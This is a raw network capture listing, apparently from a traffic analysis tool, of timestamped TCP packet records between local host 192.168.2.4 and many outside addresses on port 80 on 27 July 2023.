                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.642582893 CEST80499553.130.204.160192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.642663002 CEST4995580192.168.2.43.130.204.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.642718077 CEST4995580192.168.2.43.130.204.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.643316984 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.643409967 CEST4995880192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.670233011 CEST4995580192.168.2.43.130.204.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.695636988 CEST4995480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.695756912 CEST4995980192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.696289062 CEST4995880192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.700504065 CEST4996180192.168.2.43.130.204.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.742409945 CEST804969770.39.251.249192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.746336937 CEST4970580192.168.2.462.122.190.121
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.747176886 CEST4970380192.168.2.4104.26.7.221
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.747323990 CEST4996280192.168.2.462.122.190.121
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.748117924 CEST4996380192.168.2.4104.26.7.221
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.763433933 CEST8049703104.26.7.221192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.764308929 CEST8049963104.26.7.221192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.764439106 CEST4970380192.168.2.4104.26.7.221
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.764532089 CEST4996380192.168.2.4104.26.7.221
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.764889956 CEST4996380192.168.2.4104.26.7.221
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.779510021 CEST4992680192.168.2.4195.78.66.50
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.780999899 CEST8049963104.26.7.221192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.781220913 CEST804970562.122.190.121192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.782255888 CEST804996262.122.190.121192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.784086943 CEST4996280192.168.2.462.122.190.121
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.784086943 CEST4996280192.168.2.462.122.190.121
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.802023888 CEST8049963104.26.7.221192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.802062035 CEST8049963104.26.7.221192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.802086115 CEST8049963104.26.7.221192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.802110910 CEST8049963104.26.7.221192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.802131891 CEST8049963104.26.7.221192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.802150965 CEST8049963104.26.7.221192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.802206039 CEST4996380192.168.2.4104.26.7.221
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.802344084 CEST4996380192.168.2.4104.26.7.221
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.818355083 CEST80499553.130.204.160192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.818895102 CEST804996262.122.190.121192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.820177078 CEST804996262.122.190.121192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.820293903 CEST4996280192.168.2.462.122.190.121
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.848364115 CEST80499613.130.204.160192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.848567009 CEST4996180192.168.2.43.130.204.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.867229939 CEST804995459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.894562006 CEST4996180192.168.2.43.130.204.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.894682884 CEST4996280192.168.2.462.122.190.121
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.923310041 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.924055099 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.931736946 CEST804996262.122.190.121192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.931922913 CEST4996280192.168.2.462.122.190.121
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.939889908 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.940087080 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.940176010 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.940310955 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.953845024 CEST8049959206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.953979015 CEST8049959206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.954020023 CEST8049959206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.954047918 CEST4995980192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.954075098 CEST4995980192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.954116106 CEST8049959206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.954160929 CEST4995980192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.962888956 CEST804995459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.962918043 CEST804995459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.962939024 CEST804995459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.962961912 CEST804995459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.962982893 CEST804995459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.963005066 CEST804995459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.963026047 CEST804995459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.963027954 CEST4995480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.963048935 CEST804995459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.963072062 CEST804995459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.963094950 CEST804995459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.963093996 CEST4995480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.963093996 CEST4995480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.963124037 CEST4995480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.963155985 CEST4995480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.963860989 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.964756966 CEST4995980192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.975456953 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.976602077 CEST4996580192.168.2.4211.1.226.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979350090 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979378939 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979406118 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979433060 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979460955 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979521036 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979553938 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979559898 CEST4995880192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979559898 CEST4995880192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979561090 CEST4995880192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979584932 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979624033 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979633093 CEST4995880192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979633093 CEST4995880192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979662895 CEST4995880192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979680061 CEST4995880192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979698896 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979783058 CEST4995880192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.979937077 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.045161009 CEST4969280192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.045629025 CEST80499613.130.204.160192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.045656919 CEST80499613.130.204.160192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.045773029 CEST4996180192.168.2.43.130.204.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.055790901 CEST4996180192.168.2.43.130.204.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.115752935 CEST4971480192.168.2.480.74.154.6
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.128417015 CEST4996680192.168.2.480.74.154.6
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.135436058 CEST804971480.74.154.6192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.135596037 CEST4971480192.168.2.480.74.154.6
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.148963928 CEST804996680.74.154.6192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.149188995 CEST4996680192.168.2.480.74.154.6
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.167820930 CEST4971780192.168.2.4170.82.174.30
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.168311119 CEST4996680192.168.2.480.74.154.6
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.168742895 CEST4996780192.168.2.4170.82.174.30
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.172923088 CEST4996880192.168.2.452.86.6.113
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.187989950 CEST804996680.74.154.6192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.188024998 CEST804996680.74.154.6192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.188290119 CEST4996680192.168.2.480.74.154.6
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.203099012 CEST80499613.130.204.160192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.220736027 CEST4996680192.168.2.480.74.154.6
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.222620964 CEST8049959206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.229476929 CEST804995459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.229506016 CEST804995459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.229815006 CEST4995480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.240504026 CEST804996680.74.154.6192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.241740942 CEST4996680192.168.2.480.74.154.6
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.253917933 CEST8049965211.1.226.67192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.258130074 CEST4996580192.168.2.4211.1.226.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.258320093 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.258388042 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.258426905 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.258465052 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.258502960 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.258513927 CEST4995880192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.258543968 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.258577108 CEST8049958118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.258589983 CEST4995880192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.258622885 CEST4995880192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.258680105 CEST4995880192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.259857893 CEST4996580192.168.2.4211.1.226.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.312349081 CEST804996852.86.6.113192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.312525034 CEST4996880192.168.2.452.86.6.113
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.319297075 CEST804969259.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.389554024 CEST8049717170.82.174.30192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.391305923 CEST8049967170.82.174.30192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.391484976 CEST4996780192.168.2.4170.82.174.30
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.407191992 CEST804995780.93.82.33192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.407421112 CEST4995780192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.437258959 CEST4996880192.168.2.452.86.6.113
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.437875032 CEST4996780192.168.2.4170.82.174.30
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.438328028 CEST4995780192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.440403938 CEST4996980192.168.2.4137.118.26.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.473853111 CEST804995780.93.82.33192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.473965883 CEST4995780192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.537308931 CEST8049965211.1.226.67192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.537337065 CEST8049965211.1.226.67192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.537424088 CEST4996580192.168.2.4211.1.226.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.543921947 CEST8049874213.186.33.17192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.543986082 CEST4987480192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.566664934 CEST4996580192.168.2.4211.1.226.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.576217890 CEST804996852.86.6.113192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.576244116 CEST804996852.86.6.113192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.576299906 CEST4996880192.168.2.452.86.6.113
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.576350927 CEST4996880192.168.2.452.86.6.113
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.596790075 CEST804995670.39.251.249192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.596945047 CEST4995680192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.653593063 CEST4996880192.168.2.452.86.6.113
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.660459042 CEST8049967170.82.174.30192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.775331974 CEST4995680192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.787765026 CEST4995780192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.788161039 CEST4997080192.168.2.452.86.6.113
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.791491985 CEST4972180192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.792104006 CEST804996852.86.6.113192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.792422056 CEST4971080192.168.2.4172.67.152.159
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.792829990 CEST4997180192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.794084072 CEST4997280192.168.2.4172.67.152.159
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.808619976 CEST8049710172.67.152.159192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.808768988 CEST4971080192.168.2.4172.67.152.159
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.810374975 CEST8049972172.67.152.159192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.810509920 CEST4997280192.168.2.4172.67.152.159
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.810940027 CEST4997280192.168.2.4172.67.152.159
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.821178913 CEST804995780.93.82.33192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.821353912 CEST4995780192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.828454971 CEST8049972172.67.152.159192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.845180988 CEST8049965211.1.226.67192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.845336914 CEST4996580192.168.2.4211.1.226.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.879504919 CEST804995670.39.251.249192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.880193949 CEST804995670.39.251.249192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.880284071 CEST4995680192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.923929930 CEST8049972172.67.152.159192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.923959970 CEST8049972172.67.152.159192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.923980951 CEST8049972172.67.152.159192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.924004078 CEST4997280192.168.2.4172.67.152.159
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.924045086 CEST4997280192.168.2.4172.67.152.159
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.924108982 CEST4997280192.168.2.4172.67.152.159
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.927714109 CEST804997052.86.6.113192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.927807093 CEST4997080192.168.2.452.86.6.113
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.944231987 CEST8049967170.82.174.30192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.944327116 CEST4996780192.168.2.4170.82.174.30
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.992758036 CEST4997080192.168.2.452.86.6.113
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.042078972 CEST4995680192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.043193102 CEST4996780192.168.2.4170.82.174.30
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.071999073 CEST8049721202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.072031021 CEST8049971202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.072104931 CEST4997180192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.077649117 CEST4997180192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.095202923 CEST4970480192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.095864058 CEST4997380192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.096388102 CEST4971280192.168.2.489.161.163.246
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.097137928 CEST4997480192.168.2.489.161.163.246
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.099030018 CEST4971880192.168.2.4192.252.154.18
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.099754095 CEST4997580192.168.2.4192.252.154.18
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.126395941 CEST804971289.161.163.246192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.126504898 CEST4971280192.168.2.489.161.163.246
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.126648903 CEST8049704213.186.33.17192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.127423048 CEST8049973213.186.33.17192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.127542973 CEST4997380192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.127696037 CEST804997489.161.163.246192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.127851009 CEST4997480192.168.2.489.161.163.246
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.128048897 CEST4997380192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.128457069 CEST4997480192.168.2.489.161.163.246
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.131488085 CEST804997052.86.6.113192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.131510973 CEST804997052.86.6.113192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.131581068 CEST4997080192.168.2.452.86.6.113
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.131607056 CEST4997080192.168.2.452.86.6.113
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.132625103 CEST4997080192.168.2.452.86.6.113
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.146918058 CEST804995670.39.251.249192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.147079945 CEST4995680192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.150290966 CEST4997680192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.159054995 CEST804997489.161.163.246192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.162195921 CEST8049973213.186.33.17192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.162235022 CEST8049973213.186.33.17192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.162264109 CEST8049973213.186.33.17192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.162406921 CEST4997380192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.162406921 CEST4997380192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.165277004 CEST804997489.161.163.246192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.165306091 CEST804997489.161.163.246192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.165376902 CEST4997480192.168.2.489.161.163.246
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.165376902 CEST4997480192.168.2.489.161.163.246
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.166394949 CEST8049976172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.166493893 CEST4997680192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.167821884 CEST4997680192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.184153080 CEST8049976172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.196957111 CEST8049718192.252.154.18192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.197043896 CEST4971880192.168.2.4192.252.154.18
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.197432041 CEST8049975192.252.154.18192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.197525024 CEST4997580192.168.2.4192.252.154.18
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.265878916 CEST8049967170.82.174.30192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.271086931 CEST804997052.86.6.113192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.342444897 CEST4997580192.168.2.4192.252.154.18
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.357080936 CEST8049971202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.358329058 CEST8049971202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.358411074 CEST4997180192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.400235891 CEST4997180192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.409532070 CEST8049967170.82.174.30192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.409727097 CEST4996780192.168.2.4170.82.174.30
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.428860903 CEST4972380192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.440432072 CEST8049975192.252.154.18192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.442677975 CEST8049975192.252.154.18192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.442816019 CEST4997580192.168.2.4192.252.154.18
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.467027903 CEST8049723185.80.51.179192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.468533039 CEST4970780192.168.2.4172.217.16.179
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.482968092 CEST8049707172.217.16.179192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.483104944 CEST4970780192.168.2.4172.217.16.179
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.495002985 CEST4971180192.168.2.4192.241.158.94
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.547337055 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.547408104 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.547472954 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.547502995 CEST4996480192.168.2.4104.26.15.53
